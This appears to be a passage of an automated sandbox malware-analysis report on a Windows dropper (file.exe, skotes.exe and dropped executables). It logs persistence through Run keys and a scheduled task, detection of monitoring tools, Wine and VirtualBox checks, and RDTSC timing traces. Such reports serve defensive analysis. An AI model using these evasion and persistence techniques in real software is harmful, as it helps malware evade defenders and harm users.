Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c8dd6ecf9.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c8dd6ecf9.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6523f73121.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6523f73121.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfa5c95181.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfa5c95181.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fe110f830.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fe110f830.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

9_2_6D5A55F0

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_2-9950
Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-11641

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0F794 second address: F0EFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F12C15B7328h 0x00000011 nop 0x00000012 clc 0x00000013 push dword ptr [ebp+122D01E1h] 0x00000019 jno 00007F12C15B7322h 0x0000001f call dword ptr [ebp+122D1DCFh] 0x00000025 pushad 0x00000026 add dword ptr [ebp+122D31A4h], ebx 0x0000002c xor eax, eax 0x0000002e xor dword ptr [ebp+122D31A4h], ebx 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 xor dword ptr [ebp+122D31A4h], ebx 0x0000003e mov dword ptr [ebp+122D3C55h], eax 0x00000044 mov dword ptr [ebp+122D1D49h], eax 0x0000004a mov esi, 0000003Ch 0x0000004f mov dword ptr [ebp+122D1D49h], edi 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 sub dword ptr [ebp+122D31A4h], eax 0x0000005f lodsw 0x00000061 pushad 0x00000062 mov dword ptr [ebp+122D31A4h], ecx 0x00000068 mov bx, F570h 0x0000006c popad 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jbe 00007F12C15B7317h 0x00000077 cld 0x00000078 jno 00007F12C15B731Dh 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 mov dword ptr [ebp+122D1C96h], eax 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jmp 00007F12C15B7325h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1088AF8 second address: 1088AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087A8B second address: 1087A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087A8F second address: 1087A93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087A93 second address: 1087A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087A9F second address: 1087AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F12C08324C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087AB5 second address: 1087AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087AB9 second address: 1087AC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087AC2 second address: 1087AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12C15B731Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087AD5 second address: 1087AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12C08324CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087F2C second address: 1087F36 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12C15B7316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087F36 second address: 1087F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F12C08324C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087F49 second address: 1087F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F12C15B7316h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089D06 second address: 1089D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 jp 00007F12C08324DCh 0x0000000d jmp 00007F12C08324D6h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007F12C08324D3h 0x0000001b mov eax, dword ptr [eax] 0x0000001d jmp 00007F12C08324CFh 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089D5A second address: 1089D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1089D5E second address: F0EFC4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12C08324C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F12C08324C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D3BD1h] 0x0000002c push dword ptr [ebp+122D01E1h] 0x00000032 mov ecx, 67773A99h 0x00000037 call dword ptr [ebp+122D1DCFh] 0x0000003d pushad 0x0000003e add dword ptr [ebp+122D31A4h], ebx 0x00000044 xor eax, eax 0x00000046 xor dword ptr [ebp+122D31A4h], ebx 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 xor dword ptr [ebp+122D31A4h], ebx 0x00000056 mov dword ptr [ebp+122D3C55h], eax 0x0000005c mov dword ptr [ebp+122D1D49h], eax 0x00000062 mov esi, 0000003Ch 0x00000067 mov dword ptr [ebp+122D1D49h], edi 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D31A4h], eax 0x00000077 lodsw 0x00000079 pushad 0x0000007a mov dword ptr [ebp+122D31A4h], ecx 0x00000080 mov bx, F570h 0x00000084 popad 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 jbe 00007F12C08324C7h 0x0000008f cld 0x00000090 jno 00007F12C08324CDh 0x00000096 mov ebx, dword ptr [esp+24h] 0x0000009a mov dword ptr [ebp+122D1C96h], eax 0x000000a0 push eax 0x000000a1 push eax 0x000000a2 push edx 